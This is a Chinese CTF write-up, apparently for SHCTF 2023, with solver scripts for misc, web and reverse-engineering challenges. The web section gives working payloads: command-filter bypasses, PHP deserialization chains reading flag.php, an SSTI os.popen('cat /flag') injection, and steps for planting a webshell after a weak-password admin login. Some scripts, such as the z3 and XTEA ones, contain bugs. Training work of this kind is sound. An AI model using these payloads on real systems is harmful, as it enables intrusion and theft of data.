在线工具

赛博厨子(非常好用的解码工具)

CyberChef

n在线分解工具

factordb.com

推荐工具

MISC:

1、https://blog.csdn.net/m0_47643893/article/details/113867849

CRYPTO:

随波逐流,toolsfx,yafu

PWN:

1、libc资源下载BUUCTF在线评测 (buuoj.cn)

MISC

入门推荐

b站搜Byxs20

[WEEK1]请对我使用社工吧

利用qq反查工具找到大概地址

file

搜索,看到名校,直接尝试中国石油大学,成功

file

[WEEK1]也许需要一些py

打开zip,发现两个文件和一串摩斯,摩斯解码后得到key(需要转小写)

file

file

打开得到一个fakeflag

file

可知第一个文件为png文件修复一下可以得到一串md5值

file

用md5值对fakeflag进行爆破修复,得到正确的flag

import hashlib

def find_string_with_md5(md5_hash):
    original_string = "pNg_and_Md5_SO_GreaT"
    for i in range(2**len(original_string)):
        new_string = ""
        for j in range(len(original_string)):
            if i & (1<<j):
                new_string += original_string[j].swapcase()
            else:
                new_string += original_string[j]
        hash_object = hashlib.md5(new_string.encode())
        if hash_object.hexdigest() == md5_hash:
            return new_string
    return ""

md5_hash = "63e62fbce22f2757f99eb7da179551d2"
result = find_string_with_md5(md5_hash)
if result:
    print("The original string is: {}".format(result))
else:
    print("Failed to find the string that matches the MD5 hash value.")

# Png_AnD_md5_so_GReAt

[WEEK1]ez-misc

txt中是一长串二进制,第一想法就是二进制转图片

file

扫描二维码,得到密码
file

取出flag文件,将后最改成zip,摩斯解密,发现hint

file

file

kali!启动!直接上爆破

file
得到密码,打开flag.txt,看到是大量的字符,使用随波逐流尝试词频统计,得到flag

file

[WEEK1]签到题

厨子一把梭

file

[WEEK1]Jaeger lover

打开附件,有一张jpg图片和一个zip,010打开jpg,末尾处有一段base64,解密得到一个hint

file

大概意思是要获取一个操作系统,再通过描述,图片和图片名,可知是环太平洋电影中的暴风赤红机器人的操作系统

file

原本以为是压缩包密码,但尝试无果。随后使用其他jpg图片的隐写方法,最终使用steghigh得到了密码,得到第二张图片

file

file

看到下面不全,直接修改图片高度,将04改为05,又得到一个key,开始尝试png的隐写,最终使用oursecret获取到了flag

file

file

file

file

[WEEK1]Steganography

两张图片,一开始以为是盲水印,但尝试后无果尝试其他方法,在careful1的属性的信息中备注有些东西,猜测为部分密钥

file

开始寻找另一部分,把careful放到010中,在末尾处发现了一段base64,解码

file

将中间的替换掉就是压缩包的密码,解开就可以得到flag

file

[WEEK1]可爱的派蒙捏

拿到一张jpg图片,在文件末尾处看到有另一个PK标识符,直接binwalk分离,得到两个txt

file

file

直接使用010对两个文件进行对比,一个个手搓得到flag

file

[WEEK1]message

16进制,将00删掉,厨子一把梭

file

[WEEK1]真的签到

扫描二维码,加公众号,回复获得flag

[WEEK2]远在天边近在眼前

下载得到压缩包,解压,文件名拼接反转即可得到flag

file

[WEEK2]奇怪的screenshot

根据文件描述和图片已知部分,可知为win的截图漏洞

https://github.com/frankthetank-music/Acropalypse-Multi-Tool?search=1

利用工具修复得到完整图片,提取其中的文字进行百家姓解密得到flag

file

在线百家姓暗号转换 - 2048T在线工具站

file

[WEEK2]可爱的洛琪希

未加密,7Z解压工具可以直接解压,得到一串base64,转为图片

属性中有一段hex,010查看得到key

file

file

最后维吉尼亚解密即可得到flag

file

WEB

入门推荐

web神太多了,这里就先挂一个探姬师傅的项目

CTF, 启动! - Hello CTF (probius.xyz)

[WEEK1]babyRCE

file

分析源码,可知禁用了很多查看命令,数字和很多符号,但是没有禁用uniq函数,但是过滤了空格,所以使用${IFS}进行绕过

file

因为过滤了flag字符,需要使用通配符来绕过

file

[WEEK1]1zzphp

分析源码,第一步需要给num传参,不能为数字,但intval函数是用于获取参数的整数值,如果不是数字,就会返回FALSE,所以我们采用数组来绕过第一段。然后进入第二段过滤,利用PCRE时间回溯漏洞,通过发送大量字符串,使其超过返回上限即可绕过

PHP利用PCRE回溯次数限制绕过某些安全限制 | 离别歌 (leavesongs.com)

file

<?php
echo str_repeat('very', '250000').'2023SHCTF';
?>

file

[WEEK1]ez_serialize

一道较为基础的反序列化链子(新生赛第一周属实是偏难了,T^T)

有且仅有一篇文章推荐

php 反序列化总结_php反序列化总结_练习两年半的篮球选..哦不对安全选手的博客-CSDN博客

<?php
highlight_file(__FILE__);

class A{
  public $var_1;

  public function __invoke(){
   include($this->var_1);
  }
}

class B{
  public $q;
  public function __wakeup()
{
  if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->q)) {
            echo "hacker";           
        }
}

}
class C{
  public $var;
  public $z;
    public function __toString(){
        return $this->z->var;
    }
}

class D{
  public $p;
    public function __get($key){
        $function = $this->p;
        return $function();
    }  
}
$a=new A();
$b=new B();
$c=new C();
$d=new D();
$b->q=$c;
$c->z=$d;
$c->var=$c;
$d->p=$a;
$a->var_1="php://filter/convert.base64-encode/resource=flag.php";
echo serialize($b);
?>

[WEEK1]登录就给flag

点击登录,等待3秒,跳转到登录页面,尝试弱口令admin和password,登录成功

file

[WEEK1]飞机大战

右键查看源代码,查看JS代码

file

简单分析一下,找到flag输出的位置

file

转码获得一串base64,解密即可获得flag

file

file

[WEEK1]ezphp

不知道是故意的还是不小心的,第一个过滤接收字符在判断之后,可以直接忽视

file

随后就是漏洞利用,这里是\e的命令执行

深入研究preg_replace与代码执行 - 先知社区 (aliyun.com)

file

[WEEK1]生成你的邀请函吧~

postman发包即可

file

[WEEK2]no_wake_up

简单的反序列化

<?php
class flag{
    public $username="admin";
    public $code="php://filter/convert.base64-encode/resource=flag.php";
}
$a=new flag();
echo serialize($a);

file

解密即可获得flag

[WEEK2]ez_ssti

ssti一把梭

?name={{config.__class__.__init__.__globals__['os'].popen('cat /flag').read()}}

file

[WEEK2]EasyCMS

扫描目录,找到后门登录

http://112.6.51.212:32655/admin/admin.php

弱口令登录

admin/tao

点击文件管理,创建新文件,写入一句话木马

file

命令执行即可得到flag

[WEEK2]serialize

简单的POP链

<?php
class misca{
    public $gao;
    public $fei;
    public $a;
    public function __get($key){
        echo "misca: __get: <br>";
        var_dump($key);
        $this->miaomiao();
        var_dump($this->fei);
        $this->gao=$this->fei;
        die($this->a);
    }
    public function miaomiao(){
        echo "miaomiao:<br>";
        $this->a='Mikey Mouse~';
    }
}
class musca{
    public $ding;
    public $dong;
    public function __wakeup(){
        echo "musca: __wakeup: <br>";
        return $this->ding->dong;
    }
}
class milaoshu{
    public $v;
    public function __tostring(){
        echo"misca~musca~milaoshu~~~";
        include($this->v);
    }
}
function check($data){
    if(preg_match('/^O:\d+/',$data)){
        die("you should think harder!");
    }
    else return $data;
}

$m = new musca();
$mi = new misca();
$mls = new milaoshu();
$mls->v = "php://filter/convert.base64-encode/resource=flag.php";
$mi->fei = $mls;
$mi->gao = &$mi->a;
$m->ding = $mi;

echo urlencode(serialize(array($m)));

$t = $_GET["wanna_fl.ag"];
var_dump($t);
unserialize(check($t));

file

base64解密即可

REVERSE

进阶推荐

b站搜水番正文

[WEEK1]ez_asm

入门基础,汇编语言

汇编语言指令大全(详细)_汇编指令大全-CSDN博客

file

a = 'nhuo[M`7mc7uhc$7midgbTf`7`$7%#ubf7 ci5Y'
b = ''
for i in range(len(a)):
    b += chr((ord(a[i]) + 0x0A ) ^ 0x1E)
print(b)    #flag{It_is_als0_impor@nt_t0_13arn_4sm!}

[WEEK1]easy_re

基础的代码分析

file

a = [  0x66, 0xC6, 0x16, 0x76, 0xB7, 0x45, 0x27, 0x97, 0xF5, 0x47, 
  0x03, 0xF5, 0x37, 0x03, 0xC6, 0x67, 0x33, 0xF5, 0x47, 0x86, 
  0x56, 0xF5, 0x26, 0x96, 0xE6, 0x16, 0x27, 0x97, 0xF5, 0x07, 
  0x27, 0x03, 0x26, 0xC6, 0x33, 0xD6, 0xD7, 0x00]

flag = ''
for i in range(len(a)):
    flag += chr((16 * a[i] | a[i] >> 4) & 0xff)

print(flag)     #flag{Try_t0_s0lv3_the_binary_pr0bl3m}

[WEEK1]seed

随机数,但是双击seed并没有看到种子的值,直接开调试,这里有多种方法

The First

因为调试可以直接把值存放到v5中,所以我们直接在第一个循环后面下断点,在查看v5就可以获得v5数组的值,提取即可

file

file

key = [0x26, 0x45, 0x49, 0x8E, 0xB9, 0x43, 0xCD, 0x9B, 0xFA, 0x0C]
flag = ''
a = [0x40, 0x29, 0x28, 0xE9, 0xC2, 0x04, 0xA4, 0xED, 
  0x9F, 0x53, 0x5F, 0x75, 0x3C, 0xD1, 0xCD, 
  0x2B, 0xA8, 0xC4, 0x89, 0x69, 0x15, 0x21, 0x16, 
  0xEF, 0xD7, 0x27, 0x92, 0xDF, 0xCA, 0x53, 
  0x5F, 0x2A, 0x3C, 0xD1, 0xCE, 0x03, 0xA3, 0xEF, 
  0xA5, 0x78, 0x16, 0x1A, 0x2D, 0xE1, 0xC4]

for i in range(len(a)):
    flag += chr(a[i] ^ key[i % len(key)])

print(flag)     #flag{Give_y0u_the_se3d_and_D0_you_w@nt_t0_do}

The Second

使用idapython将我们输入的值替换

from idaapi import *
addr = 0x64FDB0     #输入的地址
a = [0x40,0x29,0x28,0xE9,0xC2,0x04,0xA4,0xED,0x9F,0x53,0x5F,0x75,0x3C,0xD1,0xCD,0x2B,0xA8,0xC4,
0x89,0x69,0x15,0x21,0x16,0xEF,0xD7,0x27,0x92,0xDF,0xCA,0x53,0x5F,0x2A,0x3C,0xD1,0xCE,0x03,
0xA3,0xEF,0xA5,0x78,0x16,0x1A,0x2D,0xE1,0xC4]
for i in range(len(a)):
    patch_byte(addr+i,a[i])

file

[WEEK1]signin

打开就能看到flag

file

[WEEK1]easy_math

多次方程,一眼经典z3

python z3库学习_python的z3库-CSDN博客

file

from z3 import *

# 定义变量
l0, l1, l2, l3, l4, l5 = Ints('l0 l1 l2 l3 l4 l5')

# 定义方程组
eq1 = (593*l0 + 997*l1 + 811*l2 + 258*l3 + 829*l4 + 532*l5) == 0x5b8e0aef71d34ff43
eq2 = (605*l0 + 686*l1 + 328*l2 + 602*l3 + 695*l4 + 576*l5) == 0x551a262360964ef7f
eq3 = (373*l0 + 512*l1 + 449*l2 + 756*l3 + 448*l4 + 580*l5) == 0x49d158a5657d6931c
eq4 = (560*l0 + 635*l1 + 422*l2 + 971*l3 + 855*l4 + 597*l5) == 0x625568d5abbabf4f3
eq5 = (717*l0 + 507*l1 + 388*l2 + 925*l3 + 324*l4 + 524*l5) == 0x50ee0c025e70e3c23
eq6 = (312*l0 + 368*l1 + 884*l2 + 518*l3 + 495*l4 + 414*l5) == 0x40e735f8aa2815f65

# 创建Solver对象
solver = Solver()

# 添加约束条件
solver.add(eq1)
solver.add(eq2)
solver.add(eq3)
solver.add(eq4)
solver.add(eq5)
solver.add(eq6)

# 求解方程组
if solver.check() == sat:
    model = solver.model()
    model[l0].as_long()
    model[l1].as_long()
    model[l2].as_long()
    model[l3].as_long()
    model[l4].as_long()
    model[l5].as_long()
    print("l0 =", hex(l0_val))
    print("l1 =", hex(l1_val))
    print("l2 =", hex(l2_val))
    print("l3 =", hex(l3_val))
    print("l4 =", hex(l4_val))
    print("l5 =", hex(l5_val))

l0 = 0x666c61677b4e30
l1 = 0x5f4f6e655f6b6e
l2 = 0x3077735f6d4074
l3 = 0x685f4233747465
l4 = 0x725f5468406e5f
l5 = 0x6d65212121217d

# # 将十六进制数值转换为对应的字节串
b0 = bytes.fromhex(hex(l0)[2:])
b1 = bytes.fromhex(hex(l1)[2:])
b2 = bytes.fromhex(hex(l2)[2:])
b3 = bytes.fromhex(hex(l3)[2:])
b4 = bytes.fromhex(hex(l4)[2:])
b5 = bytes.fromhex(hex(l5)[2:])

# 将字节串连接起来并解码为字符串
result = (b0 + b1 + b2 + b3 + b4 + b5).decode()

print(result)       #flag{N0_One_kn0ws_m@th_B3tter_Th@n_me!!!!}

[WEEK1]ez_apk

利用字符串找到main函数

file

在main函数中,我们可以看到加密函数,ctrl点击即可查看此函数

file

在加密函数中,可以看到一串字符串,一眼base58的码表,开始找密文,因为使用的是jadx,密文没有直接找到,而是在main函数的smali中

file
file
使用厨子,解密获得flag

file

[WEEK2]签到题?

直接开调

经过加密之后,查看取值数组,发现flag的base64加密头,取值,解密即可

file

file

[WEEK2]not gcc

clang llc llvm 常用编译指令-CSDN博客

利用命令将文件编译成程序,然后分析代码,利用chat辅助分析得知是一个数独,提取数字,在线数独解题,原数和解数异或后md5解密即可获得flag(

(81个数字,眼睛都快瞎掉了)

file

file

a = '407003208500020900012980004709104800061000470003270006086300040020740630304002000'
b = '497513268538426917612987354759164823261839475843275196986351742125748639374692581'
for i in range(len(a)):
    print(int(a[i]) ^ int(b[i]),end='')

#090510060038406017600007350050060023200839005840005190900051702105008009070690581

[WEEK2]pycode

粗略的阅读代码可知,将flag进行加密后替换了一些字符并倒叙,且中间插入了大量无用代码

将密文替换并翻转解密

a = 'qglrv<m>A4=;p(n<3;(m=@;(A@>B(>;=>3q@x'
b = 'ndios9j;>1:8m%k908%j:=8%>=;?%;8:;0n=u'
flag = ''
# for i in range(len(a)):
#     b += chr(ord(a[i]) - 3)
for i in range(len(b)):
    flag += chr(ord(b[i]) ^ 8)
print(flag)

#flag{1b36920e-c180-b250-6537-30238f5}

[WEEK2]Run?润!

看题目,一眼迷宫,还是立体,直接开调提取迷宫

file

一共8层,调试可获得第一层,先将第一层解出,调试输入路径后输入大量u,即可获得后几层的迷宫(这里需要注意层数的变化,调试慢一点)

file

file

# ssdddssuuuwwwwqqqdddduussaauuuaaaaassssqddddddduuwwwaasusssdd

# # 0
# 0, 1, 0, 0, 0, 0, 0, 0, 
# 0, 1, 1, 1, 1, 1, 1, 1, 
# 0, 0, 0, 0, 1, 1, 1, 1, 
# 1, 1, 1, 0, 1, 1, 1, 1, 
# 1, 1, 1, 0, 1, 1, 1, 1, 
# 1, 1, 1, 1, 1, 1, 1, 1, 
# 1, 1, 1, 1, 1, 1, 1, 1, 
# 1, 1, 1, 1, 1, 1, 1, 1

# # 1
# 1, 1, 1, 0, 1, 1, 1, 0, 
# 1, 1, 1, 1, 1, 1, 1, 1, 
# 1, 1, 1, 1, 1, 1, 1, 1, 
# 1, 1, 1, 1, 1, 1, 1, 1, 
# 1, 1, 1, 0, 1, 1, 1, 1, 
# 1, 1, 1, 1, 1, 1, 1, 1, 
# 1, 1, 1, 1, 1, 1, 1, 1, 
# 1, 1, 1, 1, 1, 1, 1, 1

# # 2
# 1, 1, 1, 0, 1, 1, 1, 0, 
# 1, 1, 1, 1, 1, 1, 1, 0, 
# 1, 1, 1, 1, 1, 0, 0, 0, 
# 1, 1, 1, 1, 1, 1, 1, 1, 
# 1, 1, 1, 0, 1, 1, 1, 1, 
# 1, 1, 1, 1, 1, 1, 1, 1, 
# 1, 1, 1, 1, 1, 1, 1, 1, 
# 1, 1, 1, 1, 1, 1, 1, 1

# # 3
# 1, 1, 1, 0, 1, 1, 1, 1, 
# 1, 1, 1, 0, 1, 1, 1, 1, 
# 1, 1, 1, 0, 1, 0, 1, 1, 
# 1, 1, 1, 0, 1, 1, 1, 1, 
# 1, 1, 1, 0, 1, 1, 1, 1, 
# 1, 1, 1, 1, 1, 1, 1, 1, 
# 1, 1, 1, 1, 1, 1, 1, 1, 
# 1, 1, 1, 1, 1, 1, 1, 1

# # 4
# 1, 1, 1, 1, 1, 1, 1, 1, 
# 1, 1, 1, 1, 1, 1, 1, 1, 
# 1, 1, 1, 1, 1, 0, 1, 1, 
# 1, 1, 1, 1, 1, 1, 1, 1, 
# 1, 1, 1, 1, 1, 1, 1, 1, 
# 1, 1, 1, 1, 1, 1, 1, 1, 
# 0, 0, 0, 0, 0, 0, 0, 0, 
# 1, 1, 1, 1, 1, 1, 1, 1

# # 5
# 1, 1, 1, 1, 1, 1, 1, 1, 
# 1, 1, 1, 1, 1, 1, 1, 1, 
# 0, 0, 0, 0, 0, 0, 1, 1, 
# 0, 1, 1, 1, 1, 1, 1, 1, 
# 0, 1, 1, 1, 1, 1, 1, 1, 
# 0, 1, 1, 1, 1, 1, 1, 1, 
# 0, 1, 1, 1, 1, 1, 1, 0, 
# 1, 1, 1, 1, 1, 1, 1, 1

# # 6
# 1, 1, 1, 1, 1, 1, 1, 1, 
# 1, 1, 1, 1, 1, 1, 1, 1, 
# 1, 1, 1, 1, 1, 1, 1, 1, 
# 1, 1, 1, 1, 1, 0, 0, 0, 
# 1, 1, 1, 1, 1, 0, 1, 0, 
# 1, 1, 1, 1, 1, 1, 1, 0, 
# 1, 1, 1, 1, 1, 1, 1, 0, 
# 1, 1, 1, 1, 1, 1, 1, 1

# # 7
# 1, 1, 1, 1, 1, 1, 1, 1, 
# 1, 1, 1, 1, 1, 1, 1, 1, 
# 1, 1, 1, 1, 1, 1, 1, 1, 
# 1, 1, 1, 1, 1, 1, 1, 1, 
# 1, 1, 1, 1, 1, 0, 1, 1, 
# 1, 1, 1, 1, 1, 0, 1, 1, 
# 1, 1, 1, 1, 1, 0, 1, 1, 
# 1, 1, 1, 1, 1, 0, 0, 0

也可以自写代码获得迷宫,借用devil_1宝宝的代码

dword=[0x407F0FEF,0x0EFFFFFFF,0x0EEFFFFFF,0x0EFFFFFFF,0x0EEFEF8FF,0x0EFFFFFFF,0x0EFEFEBEF,0x0EFFFFFFF,0x0FFFFFBFF,0x0FFFF00FF,0x0FFFF037F,0x7F7F7EFF,0x0FFFFFFF8,0x0FAFEFEFF,0x0FFFFFFFF,0x0FBFBFBF8]
mapss=[]
v5=0
for key in range(0,8):
    maps = [0] * 64
    v5 = 0
    for i in range(2):
        for j in range(31,-1,-1):
            v0=v5
            v5+=1
            maps[v0]=(dword[2 * key + i] >> j) & 1
    mapss.append(maps)
for i in mapss:
    for k in range(0,len(i),8):
        print("".join(map(str,i[k:k+8])))
    print()

file

[WEEK2]Authur's_box

RC4加密,idapython一把梭

from idaapi import *
addr = 0x61FD10     #输入的地址
a = [  0xF5, 0x19, 0x5D, 0xAC, 0xC6, 0xF1, 0xBC, 0x03, 0xA5, 0x11, 
  0x69, 0xAA, 0x20, 0xBB, 0x18, 0xE7, 0xF9, 0x16, 0x07, 0x18, 
  0x8F, 0xC5, 0xDC, 0x31, 0x40, 0xC6, 0x09, 0xC1, 0x62, 0x11, 
  0xA1, 0x96, 0xFD, 0xB9, 0xBF, 0x4F, 0x6A, 0xE6, 0x54, 0xF9, 
  0x67, 0x41]
for i in range(len(a)):
    patch_byte(addr+i,a[i])

file

[WEEK3]java是最棒的语言吗

用java写的chacha20算法,来一点小小的爆破

package ChaCha20;

import java.nio.charset.StandardCharsets;
import java.util.Arrays;
import java.util.Scanner;

public class ChaCha20 {

    private static byte[] encrypt(byte[] var0, byte[] var1, byte[] var2) {
        int[] var3 = chachaInit(var1, var2);
        byte[] var4 = new byte[var0.length];
        byte[] var5 = new byte[64];

        for(int var6 = 0; var6 < var0.length; var6 += 64) {
            chachaBlock(var3, var5);

            for(int var7 = 0; var7 < 64 && var6 + var7 < var0.length; ++var7) {
                var4[var6 + var7] = (byte)(var0[var6 + var7] ^ var5[var7]);
            }

            int var10002 = var3[12]++;
        }

        return var4;
    }

    private static int[] chachaInit(byte[] var0, byte[] var1) {
        int[] var2 = new int[16];
        var2[0] = 1634760805;
        var2[1] = 857760878;
        var2[2] = 2036477234;
        var2[3] = 1797285236;

        for(int var3 = 0; var3 < 8; ++var3) {
            var2[4 + var3] = bytesToIntLittleEndian(var0, var3 * 4);
        }

        var2[12] = 0;
        var2[13] = 0;
        var2[14] = bytesToIntLittleEndian(var1, 0);
        var2[15] = bytesToIntLittleEndian(var1, 4);
        return var2;
    }

    private static void chachaBlock(int[] var0, byte[] var1) {
        int[] var2 = Arrays.copyOf(var0, 16);

        int var3;
        for(var3 = 0; var3 < 10; ++var3) {
            chachaDoubleRound(var2);
        }

        for(var3 = 0; var3 < 16; ++var3) {
            intToBytesLittleEndian(var0[var3] + var2[var3], var1, var3 * 4);
        }

    }

    private static void chachaDoubleRound(int[] var0) {
        quarterRound(var0, 0, 4, 8, 12);
        quarterRound(var0, 1, 5, 9, 13);
        quarterRound(var0, 2, 6, 10, 14);
        quarterRound(var0, 3, 7, 11, 15);
        quarterRound(var0, 0, 5, 10, 15);
        quarterRound(var0, 1, 6, 11, 12);
        quarterRound(var0, 2, 7, 8, 13);
        quarterRound(var0, 3, 4, 9, 14);
    }

    private static void quarterRound(int[] var0, int var1, int var2, int var3, int var4) {
        var0[var1] += var0[var2];
        var0[var4] = rotateLeft(var0[var4] ^ var0[var1], 16);
        var0[var3] += var0[var4];
        var0[var2] = rotateLeft(var0[var2] ^ var0[var3], 12);
        var0[var1] += var0[var2];
        var0[var4] = rotateLeft(var0[var4] ^ var0[var1], 8);
        var0[var3] += var0[var4];
        var0[var2] = rotateLeft(var0[var2] ^ var0[var3], 7);
    }

    private static int rotateLeft(int var0, int var1) {
        return var0 << var1 | var0 >>> 32 - var1;
    }

    private static int bytesToIntLittleEndian(byte[] var0, int var1) {
        return (var0[var1 + 3] & 255) << 24 | (var0[var1 + 2] & 255) << 16 | (var0[var1 + 1] & 255) << 8 | var0[var1] & 255;
    }

    private static void intToBytesLittleEndian(int var0, byte[] var1, int var2) {
        var1[var2] = (byte)(var0 & 255);
        var1[var2 + 1] = (byte)(var0 >>> 8 & 255);
        var1[var2 + 2] = (byte)(var0 >>> 16 & 255);
        var1[var2 + 3] = (byte)(var0 >>> 24 & 255);
    }

    public static void main(String[] var0) {
        String flag = "";
        for(int i=0;i<42;i++) {
            for(int j=33;j<128;j++) {
                char ch = (char) j;
                String a = flag + Character.toString(ch);
                byte[] b = encrypt(a.getBytes(StandardCharsets.UTF_8), "Shctf_Welcomes_Have_4_good_t1me_".getBytes(), "HsehrcOedfgs".getBytes());
                String enc = "ce43283af73d106815fe5293b474f5309d44063c7fde19533300c60603dfe528d19aee2f6db615191e45";
                byte[] dnc = hexStringToBytes(enc);
                if (b[i] == dnc[i]) {
                    flag = a;
                    System.out.println(flag);
                    break;
                }
            }
        }
    }

    private static byte[] hexStringToBytes(String var0) {
        int var1 = var0.length();
        byte[] var2 = new byte[var1 / 2];

        for(int var3 = 0; var3 < var1; var3 += 2) {
            var2[var3 / 2] = (byte)((Character.digit(var0.charAt(var3), 16) << 4) + Character.digit(var0.charAt(var3 + 1), 16));
        }

        return var2;
    }
}

//flag{63955927-5a27-454c-cdc7-7b7cc9020f46}

[WEEK3]ststst

SMC + Xtea

万物皆可调试,调试过SMC

file

Xtea解密

#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>

int delta = 0x61C88647;
void decrypt(uint32_t* v, uint32_t* k) {

    uint32_t v3 = v[0];
    uint32_t v4 = v[1];
    uint32_t sum = ((32 * (-delta)) & 0xffffffff);

    int i = 0;
    for (i = 0; i <= 31; i++) {
        v4 -= (v3 + sum) ^ (16 * v3 + k[2]) ^ ((v3 >> 5) + k[3]);
        v3 -= (v4 + sum) ^ (16 * v4 + k[0]) ^ ((v4 >> 5) + k[1]);
        sum += 0x61C88647;
    }

    v[0] = v3;
    v[1] = v4;

}

int main() {
    uint32_t key[4] = { 0x01234567, 0x89ABCDEF, 0xFEDCBA98, 0x76543210 };
    uint32_t array[8] = { 0xDB8F2569, 0x40CD83E3, 0xA033E680, 0xFFF7A644, 0x690C3A17, 0xB621B866, 0x34E7E2A7, 0xAD10A692 }; //密码数据
    uint32_t temp[2] = { 0 };
    int i = 0;
    for (i = 0; i <= 8; i += 2) {

        temp[0] = array[i];
        temp[1] = array[i + 1];
        decrypt(temp, key);

        printf("%c%c%c%c%c%c%c%c", *((char*)&temp[0] + 0), *((char*)&temp[0] + 1), *((char*)&temp[0] + 2), *((char*)&temp[0] + 3), *((char*)&temp[1] + 0), *((char*)&temp[1] + 1), *((char*)&temp[1] + 2), *((char*)&temp[1] + 3));

    }

    return 0;
}

//5ef846656801c9b9714388d2ccd98cdd

[WEEK3]easyre

PYC逆向,pyc三部曲:拆包,反编译,代码审计

Python 反编译:pyinstxtractor工具和uncompyle6库的使用_小嗷犬的博客-CSDN博客

file

反编译

https://tool.lu/pyc/

file

爆破xor,解密,生成新的pyc

import base64
import marshal
import sympy as sp
encoded_data = b'#`VVVVVVVVVVVVVVVVVVVVVSVVVVFVVVV_YZVVVVMVU|VNFV@pU|V{xUMVYvVzBSMVDSVFRVMFDSV\\VQMV@\x7fVAxPMFU{V@BPp`]vU%B_MF]eVy]VMFY|UxZUVFUbTPBSMVrSVFRVMV\x7fCVT|]N`^VVVVVVVVVVVVVVVpVVVVPVVVVF`VVV_GFVVVVsVU\'V@FUp`PSVO\'TMV].V$FUMVPSVBFVOC".U_`SqV]/UU|VQ`U/V_`RsV]/V^ZUQpVMVUtVMVR@V_\'SqV]/Vo|VqV]/UU|VVpU/Vy`RGVU/Vy`SGVUoPPFTUVU.U_\'SsVXSV_\'QqVQRVQ&pqFM/UPFSQ`U|VENVqFE/V$`TqVFMVUtVMVR@V_\'SqV]/Vo|VqV]/UU|VVpU/Vy`RGVU/Vy`SGVU/Vy`TqVFMV_`TqVZMVUtVMVR@VU|VqFs/UvVRqVM/U\'RVxFRUV_QfqVACVT|RCb|VVFVV!FVVVVSgVFVVVT|Q%pEdvOY\'%pAnN@"yMsxSuPAb%p{~rOE{NO]nNOyvUzQ`tPAbMT|^%pYeMO{vTOUdN@{bsPA#sYxUB.xUvcxUvAx\\N%{`vPAnsPA#sYxRN%\x7f\x7ftcxUv!|Vtp/VVVS!UzM&u~"`rsx[tzZ\'O%AbN$]"t_FUVVVVto`VVVVVVF`UUV^ZVDVU_V^^VFNTTVRZVEVUPpRNVEVTt\x7fRVVVUmT`VVVPA#N@&`uPAqv%A"tnxVVVSN{U!ez%M\'!&&VP ez!UZmA.\'X"g^\'/NUcvXd.TPRTTD!&UB\\`dT.R}Q{!QQUdr~UguyU&sTU"u$An^PMdN@t!rpA&sPNcXQxSr@Am@p]bu\'#gT_^EVVVVtp|VVVUvU@YxM@Ye%pA`tz{bsYxQv@"`sOCvUzAbN%.|MsxRMzo\x7fM&x]M@"}ty{`sPA|tp/VVVUnS`VVV_^GVVVVt\x7fVVVVSvTSocu%E&uPB<VFVVV_ZFVVVVTUFRVFFTTVRZVpxTTVR\\Vp**'
for xor_key in range(101):
    x = sp.symbols('x')
    f = x ** 2 + x + 1
    integral_value = sp.integrate(f, (x, 1, xor_key))
    check_value = 13024

    if integral_value * 3 == check_value:
        xor_decoded_data = bytes([byte ^ xor_key for byte in encoded_data])
        decoded_data = base64.b64decode(xor_decoded_data)
        open("new.pyc","wb").write(decoded_data)
        exit()

补头,再次反编译

file

file

RC4解密,直接套模板

def init_S():
    global S
    for i in range(256):
        S.append(i)

def init_T():
    global Key
    global T
    Key = 'example_key'
    keylen = len(Key)
    for i in range(256):
        tmp = Key[(i % keylen)]
        T.append(tmp)

def swap_S():
    j = 0
    for i in range(256):
        j = (j + S[i] + ord(T[i])) % 256
        tmp = S[i]
        S[i] = S[j]
        S[j] = tmp

def Get_KeyStream():
    global KeyStream
    txtlen = len(ele) # >= 19
    j, t = (0, 0)
    for i in range(txtlen):
        i = (i + 1) % 256
        tmp = S[i]
        j = (j + S[i]) % 256
        S[i] = S[j]
        S[j] = tmp
        t = (S[i] + S[j]) % 256
        KeyStream.append(S[t])

def Get_Decode():
    deres = []
    for i in range(len(ele)):
        # print(ord(ele[i]),end="")
        deres.append(ele[i] ^ KeyStream[i])
    return deres

if __name__ == '__main__':
    ele = [216,148,30,171,155,102,116,235,93,64,27,186,230,232,19,51,87,221,14,230,146,52,241,128,109,104,235,61,8,97,2,9,46,181,5,66,176,176,47,68,140,89]
    # print(len(ele))
    T, S, Key = [], [], []
    PlainText, CryptoText, KeyStream = '', '', []
    text = ""
    init_S()
    init_T()
    swap_S()
    Get_KeyStream()
    deres = Get_Decode()
    print(deres)
    for z in deres:
        print(chr(z),end="")

#flag{d8e8d9d0-b2b1-7304-74b760-90b11ab6a3}

[WEEK3]喵?喵。喵!

GO语言的AES加密

初步分析一下源码

file

AES-CBC加密

file

先将密文base64解密,再进行AES解密,密钥长度应该是8位或16位,所以main函数不是密钥,OK,调试找IV和密钥

调试可知密钥为023_S0_e4sy_m1ao,IV为SHCTF_2023_S0_e4

file

[WEEK3]crackme

lua语言的逆向,利用在线工具反编译,会有一些错误,利用flag{的格式稍作修改(多了一个-1)

https://www.luatool.cn/index.php

file

分析代码,先对flag进行简单的运算后,随后判断,分支执行异或

先手搓出数组b,然后向前异或,最后爆破,flag需要自己补一个f(比较菜,手搓b可以忽略第一个分支产生的数组越界的问题)

a = [54, 57, 566, 532, 1014, 1, 7, 508, 10, 12, 498, 494, 6, 24, 14, 20, 489, 492, 0, 10, 
     490, 498, 517, 539, 21, 528, 517, 530, 543, 9, 13, 0, 4, 51, 562, 518, 515, 14, 518, 
     3, 2, 0, 519, 56, 3, 62, 575, 514, 47, 31, 1, 594, 117, 15]
b = [54, 57, 566, 532, 1014, 1, 7, 508, 10, 12, 498, 494, 6, 24, 14, 20, 489, 492, 0, 10, 
     490, 498, 517, 539, 21, 528, 517, 530, 543, 9, 13, 0, 4, 51, 562, 518, 515, 14, 518,
     3, 2, 0, 519, 56, 3, 62, 575, 514, 47, 527 ,528, 529, 67]
l = len(a) - 6

for i in range(l, -1, -1):
    b[i] = b[i] ^ b[i + 1]
    print(b, end=',')

code = [0, 553, 543, 550, 16, 516, 498, 499, 500, 8, 2, 14, 508, 18, 20, 12, 2, 22, 511, 19, 19, 25, 499, 1, 516, 31, 10, 538, 31, 525, 18, 27, 22, 22, 18, 33, 531, 21, 534, 536, 30, 29, 31, 31, 536, 544, 547, 541, 34, 544, 527, 528, 529, 67]
print(len(code))
for i in range(1,len(code)):
    for j in range(32,128):
        if ((j + i) % 333 + 444) % 555 == code[i]:
            print(chr(j),end='')

# lag{C000ngr4tulat1ons!Y0u_Cr4cked_m3_45ecdc0792a3!!!}

PWN
